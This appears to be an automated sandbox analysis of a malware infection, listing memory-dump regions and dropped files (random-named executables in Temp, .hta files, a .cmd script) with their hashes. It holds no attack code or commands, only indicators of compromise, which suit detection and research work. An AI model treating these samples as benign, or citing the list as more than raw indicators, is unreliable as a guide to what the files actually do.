memory/1828-32-0x0000000000430000-0x00000000008F9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

MD5 515748a93ce7beb3f4416ec66ba8488e
SHA1 3ba2f1a56dcc91967361622c56b1ba545cda4325
SHA256 a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6
SHA512 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

MD5 896dc9ae02a4b0cf429b4346a3990fae
SHA1 17f297bb4cf3acd07078fc5d73c1d6564a8c0710
SHA256 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2
SHA512 e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c

memory/4592-65-0x0000000000F70000-0x0000000001020000-memory.dmp

memory/4592-66-0x0000000005EA0000-0x0000000006444000-memory.dmp

memory/4008-70-0x0000000000400000-0x000000000045F000-memory.dmp

memory/4008-68-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1828-71-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1952-72-0x000001C44F180000-0x000001C44F260000-memory.dmp

memory/1952-73-0x000001C44F2D0000-0x000001C44F382000-memory.dmp

memory/1952-74-0x000001C44F510000-0x000001C44F532000-memory.dmp

memory/1952-75-0x00007FF719E00000-0x00007FF71A2BB000-memory.dmp

memory/1952-77-0x000001C44F660000-0x000001C44F6D6000-memory.dmp

memory/1952-76-0x000001C44F590000-0x000001C44F5E0000-memory.dmp

memory/1952-78-0x000001C44F540000-0x000001C44F55E000-memory.dmp

memory/1828-79-0x0000000000430000-0x00000000008F9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

MD5 87da0483aefde76a5086c5b2ea14304f
SHA1 ae6b27aeaf487666c71b26397709004e65b09002
SHA256 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f
SHA512 ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4

memory/3380-96-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe

MD5 5b0bf9144e2661027c1621957b1ef278
SHA1 589efc0736ecc18d94e4dd8d353502e8d76738c4
SHA256 a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f
SHA512 e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177

C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta

MD5 f6484510eab66e7220c3c21ee3cd844d
SHA1 f59ba92102679647ec2443690247fc056d9c0cde
SHA256 29ac523a18d55dfe3df8c1452168f8f2e7f7b53d3ed4bacbe71e04e3517eaf16
SHA512 4fcb2e3114073796b62b1606568997a12a3a568d46ca2c4c984ab3658b0948d1c5706bc386483e772d5e089cb365b55d62d6abebef64327b2dd3d536db65772f

memory/1960-123-0x0000000002EC0000-0x0000000002EF6000-memory.dmp

memory/1960-124-0x0000000005910000-0x0000000005F38000-memory.dmp

memory/1960-125-0x0000000006040000-0x0000000006062000-memory.dmp

memory/1960-127-0x0000000006180000-0x00000000061E6000-memory.dmp

memory/1960-126-0x0000000006110000-0x0000000006176000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbk51waj.54i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1960-137-0x0000000006330000-0x0000000006684000-memory.dmp

memory/1960-138-0x0000000006850000-0x000000000686E000-memory.dmp

memory/1960-139-0x00000000068A0000-0x00000000068EC000-memory.dmp

\??\pipe\crashpad_4072_LJADQDXCUVROZVCW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1960-149-0x00000000081A0000-0x000000000881A000-memory.dmp

memory/1960-150-0x0000000006DA0000-0x0000000006DBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/1828-183-0x0000000000430000-0x00000000008F9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6195a91754effb4df74dbc72cdf4f7a6
SHA1 aba262f5726c6d77659fe0d3195e36a85046b427
SHA256 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512 ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e66d6452cb50e1008429a093a9204ad6
SHA1 b8f17762a4f4d5fc84675b617df9d76819416e59
SHA256 20280a658e0c42f6a97290f6977154c97560649ddb10aa0e8f031d52b959f6c3
SHA512 27f4d0f2e9ec2448e8f160d7ab783deda49be107295928a19db61b7f8a13f823a07f1775d72ca4c5f9a797a174d0c169e7c259d7760c8e7d762fb6a10932f51b

memory/3380-209-0x0000000000400000-0x000000000086A000-memory.dmp

memory/3380-208-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4fcd87aa23c368499610af097ad0bfed
SHA1 5645b817b1ec4480fa13277219a07061f36b048b
SHA256 f147de78e401af351471727cd1c338aa28ccf58a4077aae9f6ec4fa387669823
SHA512 37361b08a7aa55a4f7829acae8b682434f0d29d6a8eda64236d0ecfb819a22c3c9bdab7c578d10f40ff05ff1eecd90c58cf268ae17011b3ff04ffe6058b53449

C:\Temp\9undwL0Qa.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7367c09dd1bc160eef95328a43c62932
SHA1 a016bf8e7a50a43f74248a95548a200f79ebfd06
SHA256 f8d297cfe014d6c55fe14bfa53e1894f8b54114844bf948c19c960a1091499aa
SHA512 e5388133592440b072eb2e3250a031f997261476c2862c2acfe7111274a3d3691e1bb98a701f34dc08628d9b96586fac4d8a7db7dfff888727c432cf69f9844e

memory/1828-246-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/2868-248-0x00000000071C0000-0x0000000007256000-memory.dmp

memory/2868-249-0x0000000007150000-0x0000000007172000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 d433e1dc943e6ea29d67cf72d2f6fecd
SHA1 9964aa3e596d93673c4d84695dc94d6f1a9766cd
SHA256 a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5
SHA512 caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43

memory/2508-257-0x0000000000260000-0x0000000000580000-memory.dmp

memory/2508-259-0x0000000000260000-0x0000000000580000-memory.dmp

C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/3164-271-0x0000000000D70000-0x00000000011C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8811a30103b6e5b73151657904e0dc25
SHA1 fee59729d6dffd438214ee5256de3bd77829ba9e
SHA256 18d9954fbda205c9de809f918fda65898f96b2de5c389166d86f60694d054af0
SHA512 26989d2624ad94a8e5cad9c1a6ef16e6439fd572d43713b4042a9fbf0d74bd1e69f63f8c96172de22d991105ba451db25855c9659121897c7a3eab1f33b43837

memory/3164-274-0x0000000000D70000-0x00000000011C2000-memory.dmp

memory/3164-275-0x0000000000D70000-0x00000000011C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

MD5 41e7a544f14c8eeda7675b6f8fc2f267
SHA1 98585d0462f44ace4216e00c0ae33f7b3606e0d4
SHA256 b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843
SHA512 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef

memory/3380-291-0x0000000000400000-0x000000000086A000-memory.dmp

memory/3312-293-0x0000000000F60000-0x000000000128E000-memory.dmp

memory/2328-307-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/3312-309-0x0000000000F60000-0x000000000128E000-memory.dmp

memory/1828-322-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/3164-323-0x0000000000D70000-0x00000000011C2000-memory.dmp

memory/3164-326-0x0000000000D70000-0x00000000011C2000-memory.dmp

memory/3380-327-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2328-328-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/2328-329-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/3740-331-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/3672-333-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/3672-334-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/1828-335-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/3380-336-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2328-337-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/1828-338-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/3380-339-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2328-340-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/1828-341-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/3380-346-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

MD5 49a690607e1d76e6970b724c4fd22ec7
SHA1 4b670fc77c181e9afb3986729ee3b585bc460c3f
SHA256 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7
SHA512 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b

memory/2328-361-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/5072-363-0x0000000000C90000-0x0000000000F8F000-memory.dmp

memory/3380-366-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091742001\ff28c3aaec.exe

MD5 1b7c22a214949975556626d7217e9a39
SHA1 d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512 ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

memory/5072-374-0x0000000000C90000-0x0000000000F8F000-memory.dmp

memory/1828-375-0x0000000000430000-0x00000000008F9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe

MD5 cf6bd1302ab35c1275fedadbabde12fa
SHA1 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1
SHA256 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7
SHA512 c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04

memory/4400-391-0x0000000000240000-0x0000000000E84000-memory.dmp

memory/2328-392-0x0000000000F80000-0x00000000012AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe

MD5 639af76cb7333cbd609da5d52a6e195b
SHA1 a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483
SHA256 a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8
SHA512 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51

memory/1828-407-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/836-409-0x00000000004B0000-0x0000000000EE8000-memory.dmp

memory/4400-410-0x0000000000240000-0x0000000000E84000-memory.dmp

memory/4400-411-0x0000000000240000-0x0000000000E84000-memory.dmp

memory/2328-412-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/2468-413-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2468-415-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4400-414-0x0000000000240000-0x0000000000E84000-memory.dmp

memory/2468-419-0x0000000010000000-0x000000001001C000-memory.dmp

memory/1828-423-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/836-425-0x00000000004B0000-0x0000000000EE8000-memory.dmp

memory/836-424-0x00000000004B0000-0x0000000000EE8000-memory.dmp

memory/836-429-0x00000000004B0000-0x0000000000EE8000-memory.dmp

memory/3748-430-0x0000000000400000-0x000000000042F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\H2Y9DKVI\success[2].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2328-434-0x0000000000F80000-0x00000000012AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe

MD5 db3632ef37d9e27dfa2fd76f320540ca
SHA1 f894b26a6910e1eb53b1891c651754a2b28ddd86
SHA256 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d
SHA512 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd

memory/1124-463-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/5000-464-0x0000000000F80000-0x00000000012AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe

MD5 f071beebff0bcff843395dc61a8d53c8
SHA1 82444a2bba58b07cb8e74a28b4b0f715500749b2
SHA256 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
SHA512 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d

memory/1828-482-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/2328-513-0x0000000000F80000-0x00000000012AE000-memory.dmp

memory/4400-530-0x0000000000BA0000-0x0000000000ECE000-memory.dmp

memory/4400-532-0x0000000000BA0000-0x0000000000ECE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe

MD5 e524a911bf5490af65d4c454439659df
SHA1 88f2af775e8e778d6400fb475207fd4496029272
SHA256 604b78ae03e4db50d13dab3eb2a1a46ef7630d7d383923a773256cd2136844ec
SHA512 dab429e8153e0a761edd33c05f1d2f2da5d2e7171e3908c10bf75bbcc5196b693756a5ac5455ebee2c634deae82d194ffed5de36ea6903574231d7947cabaf30